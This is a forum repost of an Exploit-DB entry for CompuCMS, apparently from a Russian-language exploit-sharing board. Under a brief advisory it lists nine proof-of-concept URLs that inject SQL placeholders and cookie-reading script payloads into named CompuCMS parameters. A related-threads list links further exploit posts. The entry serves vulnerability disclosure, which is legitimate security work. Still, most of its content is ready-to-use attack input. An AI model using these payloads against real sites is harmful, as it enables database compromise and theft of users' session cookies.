Exploit CompuCMS - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
34536
Проверка EDB
  1. Пройдено
Автор
HIGH-TECH BRIDGE SA
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2010-08-26
CompuCMS - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities
Код: 
source: https://www.securityfocus.com/bid/42773/info

CompuCMS is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.asp?mode=visresultat&sogeord=%27+ANY_SQL_CODE

http://www.example.com/index.asp?mode=for!forside!gb&sprog=gb'"><script>alert(document.cookie)</script>

http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138&Dir=&site=demo%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ed&NoElementNum=0&NoFirstElement

http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138&Dir=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C&site=demo&NoElementNum=0&NoFirstElement

http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C&vispic=2138&Dir=&site=demo&NoElementNum=0&NoFirstElement

http://www.example.com/_CompuCMS/_CMS_output/_visbillede.asp?billede=1.jpg&tekst=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

http://www.example.com/_CompuCMS/_CMS_output/_visbillede.asp?billede=1.jpg%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&tekst=

http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138+ANY_SQL_CODE&Dir=www.compucms.dk/demo/&site=demo&NoElementNum=0&NoFirstElement

http://www.example.com/demo/index.asp?mode=nyh!forside~1220010667!dk&visid=383%27+ANY_SQL_CODE
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Vaidya-Mitra 1.0 - Multiple SQLi
Ответы
0
Просмотры
607
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Online Thesis Archiving System v1.0 - Multiple-SQLi
Ответы
0
Просмотры
620
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Zenphoto 1.6 - Multiple stored XSS
Ответы
0
Просмотры
649
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Sales Tracker Management System v1.0 - Multiple Vulnerabilities
Ответы
0
Просмотры
578
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)
Ответы
0
Просмотры
607
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Online Clinic Management System 2.2 - Multiple Stored Cross-Site Scripting (XSS)
Ответы
0
Просмотры
583
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Bang Resto v1.0 - 'Multiple' SQL Injection
Ответы
0
Просмотры
3K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC)
Ответы
0
Просмотры
1K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)
Ответы
0
Просмотры
2K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Free MP3 CD Ripper 2.8 - Multiple File Buffer Overflow (Metasploit)
Ответы
0
Просмотры
991
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу